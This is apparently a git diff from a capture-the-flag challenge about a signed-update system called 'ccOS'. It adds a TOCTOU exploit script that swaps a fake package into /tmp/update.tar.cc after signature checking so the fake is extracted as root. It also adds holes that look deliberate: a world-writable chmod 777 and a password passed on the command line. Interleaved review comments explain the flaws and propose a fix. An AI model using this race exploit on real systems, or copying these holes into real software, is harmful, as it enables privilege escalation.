diff --git a/solution/exploit.sh b/solution/exploit.sh
new file mode 100644
index 0000000..8db813c
--- /dev/null
+++ b/solution/exploit.sh
@@ -0,0 +1,16 @@
+#!/bin/sh
+
+# The solution require the original update.tar.cc in /tmp named 'orig'
+# and the fake package renamed to 'pwn' in /tmp. Both need to have chmod 777
+
+cd /tmp;
+cp orig update.tar.cc;
+chmod 777 update.tar.cc;
+sudo -u upgrade /bin/sh /update.sh > log &
+while true; do
+ if [[ "$(cat log | grep Checking)" ]]; then
+ sleep 0.01
+ cp pwn update.tar.cc;
+ fi
+done;
+
diff --git a/solution/update.tar.cc b/solution/update.tar.cc
new file mode 100644
index 0000000..4909928
Binary files /dev/null and b/solution/update.tar.cc differ
diff --git a/update/update.sh b/update/update.sh
index 1e141bd..efdffc4 100755
--- a/update/update.sh
+++ b/update/update.sh
@@ -13,30 +13,29 @@ if [[ "$auth" != "$password" ]]; then exit 1 fi - pubkey="/pub.pem" file="/tmp/update.tar.cc" -/bin/chmod 777 $file +sig="/tmp/sig" /bin/echo "### ccOS Update Script ###" /bin/echo "[+] Starting" -/bin/sleep 1 /bin/echo "[+] Extracting Signature" skip=$(expr $(stat -c '%s' $file) - 256) if [[ -L $file ]] then exit 0 fi -/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip +/bin/dd if=/tmp/update.tar.cc of=$sig bs=1 count=256 skip=$skip /usr/bin/truncate -s $skip $file -check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file` +/bin/echo "[+] Checking Signature" +check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file` if [ "$check" == "Verified OK" ] then /bin/echo "[+] Signature is valid!" /bin/echo "[+] Upgrading..." /bin/tar -xvf $file -C / - /bin/rm /tmp/sig + /bin/rm $sig /bin/echo "[+] Done" else /bin/echo "[-] Signature error, exiting..." - /bin/rm /tmp/sig + /bin/rm $sig fi
diff --git a/webpanel/update.php b/webpanel/update.php
index 95a0bdb..0f3bd43 100644
--- a/webpanel/update.php
+++ b/webpanel/update.php
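Review bot: The new `check=\`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file\`` and the later `/bin/tar -xvf $file -C /` still read the same `/tmp/update.tar.cc`, and the `stat`, `dd` and `truncate` steps before them modify that shared path in place, so the bytes that pass verification are not guaranteed to be the bytes that get extracted as root; the `/bin/chmod 777 $file` this hunk removes is re-added on the web side as `exec("/bin/chmod 777 /tmp/update.tar.cc")` in webpanel/update.php, which leaves the file writable by every local user during that window. Renaming the signature to `sig="/tmp/sig"` does not change this, and a fixed name in /tmp is itself a predictable path that another user can pre-create. The prologue below copies the upload once into a `mktemp -d` directory owned by the running user and performs every later step on that private copy, with an EXIT trap that also makes the two `/bin/rm $sig` lines unnecessary; it also turns the symlink check's `exit 0` into `exit 1`, since the current code reports success for an input it refused to process. The hunk opens inside the password check whose `if` line precedes it, so that part of the script is not visible here.
```shell
upload="/tmp/update.tar.cc"
# Work on a private copy owned by this user so the content that is verified
# is the content that is extracted; the shared upload is read exactly once.
work=$(mktemp -d) || exit 1
trap 'rm -rf -- "$work"' EXIT
file="$work/update.tar.cc"
sig="$work/sig"
if [[ -L "$upload" ]]; then exit 1; fi
/bin/cp -- "$upload" "$file" || exit 1
# … unchanged: banner echo lines, skip=, dd, truncate, openssl verify and tar, all operating on "$file" …
# … dropped: both "/bin/rm $sig" lines, the EXIT trap removes "$work" …
```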
@@ -5,8 +5,9 @@ require_once("includes/header.php"); require_once("includes/nav.php"); if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) { - move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc'); - exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result); + move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc'); + exec("/bin/chmod 777 /tmp/update.tar.cc"); + exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result); } ?> @@ -19,7 +20,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['
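Review bot: The rewritten `exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result);` still places the submitted password inside the command string, so it is part of the argument list of the shell that `exec` spawns and is readable in the process list by any local user while the update runs. Setting it in the environment before the call, `putenv('key=' . $_POST['password']);` followed by `exec('/usr/bin/sudo /bin/sh /update.sh', $result);` (with the sudoers policy allowing `key` through, as the existing setup presumably already does), keeps it out of argv; the `exec("/bin/chmod 777 /tmp/update.tar.cc");` added just above is covered in the update.sh note. The unchanged condition compares `$_SERVER['REQUEST_METHOD']` against a bare `POST` rather than the string `'POST'`, and it tests `$_FILES['update']` and `$_FILES['upfile']` while the body moves `$_FILES['file']`, which looks like three names for one field; those are context lines, so I only flag them. The `if` block closes inside the hunk, but the file continues past it.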